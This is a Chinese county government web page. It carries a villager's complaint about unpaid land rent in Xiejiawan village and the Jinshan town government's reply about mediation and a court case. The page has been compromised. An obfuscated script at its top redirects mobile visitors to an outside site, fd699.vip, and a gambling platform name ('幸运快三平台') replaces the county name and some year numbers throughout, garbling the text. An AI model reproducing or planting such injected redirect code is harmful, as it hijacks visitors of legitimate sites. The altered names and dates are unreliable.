function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://fd699.vip" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();  
  幸运快三平台 > 书记县长信箱回复 > 正文
关于反映金山镇谢家湾村土地租金问题的答复
时间:2020-02-26 17:40:45    来源:金山镇人民政府
 
标  题 关于反映金山镇谢家湾村土地租金问题的答复
内  容 幸运快三平台人民政府:
    我是幸运快三平台金山镇谢家湾村村民,我们村的土地被村里租给果园老板,部分已经有五年没有给我们支付过一分钱的租金,今年疫情,我们也不能去外面打工,指望这些钱给孩子们交学费,我们多次找到村里,村里说让我们找上面的领导,可我们不知道上面的领导该找谁,恳请政府出面协调帮我们追回租地金。
    
办件编号 20200201 留言时间   2020-02-20 
答复状态 处理完毕 
答复内容
尊敬的网民:
    您好!接到相关单位转来您在幸运快三平台政府网站书记县长信箱留言反映的问题后,金山镇党委、镇政府高度重视,第一时间组织专人对您反映的情况进行了实地调查核实,现将核查处理结果答复如下:
    幸运快三8月,我镇专门成立了谢家湾村土地流转工作组,要求果园承包人支付农民的土地租金,前后与果园承包人进行了多次协调并达成一致,果园承包人表示,在苹果出售后,将全部付清所欠农民的土地租金,并签定了限期保证书。在保证书约定期到期后,果园承包人未能按约定支付土地租金。按保证书的约定,由村民代表将果园承包人起诉到县人民法院,请求法院审理。幸运快三11月,镇土地流转工作组、村干部以及群众代表达成一致,并将起诉资料送至姚庄法庭,法庭计划在2020年1月开庭审理此案,但由于新型冠状病毒引发的肺炎疫情的影响,将此案暂时推后。现镇土地流转工作组与村干部、群众代表已与姚庄法庭协调好,姚庄法庭立即按法律程序,开庭审理此案,届时我镇会将最新情况向群众公布,给您及广大群众一个满意的答复,感谢您对我们工作的支持!


 

金山镇人民政府
2020年2月26日
  


上一篇:关于反映某小学相关问题的答复
下一篇:关于反映婴儿异地接种疫苗问题的答复
主办:幸运快三平台人民政府 承办:幸运快三平台人民政府办公室 网站地图
地址:幸运快三平台大像山镇冀城南路统办大楼二楼 邮箱:ggxxxzx@126.com 电话:0938-5622811
幸运快三平台 邮箱:ggxw110@163.com 电话:0938-5625345
陇ICP备09003452号     技术支持:甘肃浡然网络科技有限公司
 网站标识码:6205230001